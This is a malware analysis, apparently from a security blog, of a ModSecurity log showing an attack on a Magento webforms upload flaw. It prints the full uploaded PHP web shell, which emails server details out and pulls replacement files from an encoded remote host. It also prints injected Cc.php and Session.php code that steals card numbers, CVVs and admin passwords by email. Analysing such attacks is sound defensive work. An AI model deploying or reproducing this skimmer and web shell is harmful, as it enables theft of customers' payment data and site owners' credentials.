In ModSecurity auditlog we found magento webforms upload vulnerability.
--ab16e752-B-- POST /js/webforms/upload/ HTTP/1.1 User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm) Host: malware.expert Accept: */* Content-Length: 2163 Expect: 100-continue Content-Type: multipart/form-data; boundary=------------------------6a5fe0ef92e39879
Looking better POST payload, found this image.phtml script, which first uploaded to customer website. If index.php / image.phtml file success uploaded, it can access from www and executed!
image.phtml
--------------------------6a5fe0ef92e39879
Content-Disposition: form-data; name="files[]"; filename="image.phtml"
Content-Type: application/octet-stream
<?php
echo base64_decode("RmF0aHVyRnJlYWt6IFdhcyBIZXJlICE=");
$uname = php_uname();
function auto($type,$path = null, $content = null){
$root = $_SERVER['DOCUMENT_ROOT'];
$file = $root."/".$path;
switch($type){
case "PATCH":
if(unlink($root."/js/webforms/upload/index.php")){
echo "Patch = Success<br>";
} else {
echo "Patch = Failed<br>";
}
break;
case "LOG":
$write = fopen($file, "w");
if($write){
echo (fwrite($write,$content) ? "Write : '".$file."' [Success]<br>" : "Write : '".$file."' [Failed]<br>");
fclose($write);
} else {
echo "File : '".$file."' [Not Writeable]<br>";
}
break;
}
}
mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
echo "<br>".$uname."<br>";
auto("PATCH");
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
auto("LOG","skin/adminhtml/default/default/xmlconnect/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","skin/adminhtml/default/default/images/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","shell/htaccess.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='file'><input type='submit' name='upload' value='upload'></form>";
if(isset($_POST['upload'])){
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
echo "Success";
} else {
echo "Failed";
}
}
?>
--------------------------6a5fe0ef92e39879--
First it send email to fileputcontent@gmail.com notify details like Hostname, URL, IP:
mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
Then it try Patch magento and remove itself.
if(unlink($root."/js/webforms/upload/index.php")){
Finally it replace magento payment gateway Cc.php to steal customer payment details and session.php to capture admin login details.
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
Cc.php
In Cc.php file added more code to capture customer Payment Details and send them email again. In function assignData() added more code to call another function:
public function assignData($data)
{
.
.
.
//THIS LINE ADDED
$this->ccNumberProccess();
In ccNumberProccess function steal customer payment details and send them in email to fileputcontent@gmail.com:
function ccNumberProccess()
{
$pay = $this->getInfoInstance();
$object = new Mage_Checkout_Block_Onepage_Billing;
$billing = $object->getQuote()->getBillingAddress();
$email = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
$setBilling = $this->setBilling($billing->getFirstname(),$billing->getLastname(),$billing->getStreet(1),$billing->getStreet(2),$billing->getCity(),$billing->getRegion(),$billing->getPostcode(),$billing->getCountry(),$billing->getTelephone(),$email);
$invoice = "";
foreach($setBilling as $key=>$value){
$invoice .= $key.' = '.$value."\n";
}
$bin = str_replace(' ', '', $pay->getCcNumber());
$bin = substr($bin, 0, 6);
$getbank = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
$jeniscc = explode("</td><td>", $getbank[2]);
$namabnk = explode("</td></tr>", $jeniscc[5]);
$ccbrand = $jeniscc[2];
$ccbank = $namabnk[0];
$cctype = $jeniscc[3];
$ccklas = $jeniscc[4];
$invoice .= "Card = ".$pay->getCcNumber()."\n";
$invoice .= "Expired = ".$pay->getCcExpMonth()."/".substr($pay->getCcExpYear(),-2)."\n";
$invoice .= "Security = ".$pay->getCcCid()."\n";
$invoice .= "Site = http://".$_SERVER['HTTP_HOST']."/\n";
$invoice .= "Date = ".date("d-m-Y h:i:s");
$subject = $ccbank." - ".$cctype." - ".$ccklas." From ".$_SERVER['HTTP_HOST']."|".$setBilling['Country'];
mail(base64_decode("ZmlsZXB1dGNvbnRlbnRAZ21haWwuY29t"),$subject,$invoice,"From: ".$billing->getFirstname()." ".$billing->getLastname()." <".$email.">");
}
Session.php
It’s also steal magento session information (username & password) and send they with email:
public function login($username, $password, $request = null)
{
.
.
.
//ADDED THIS LINE
mail("fileputcontent@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);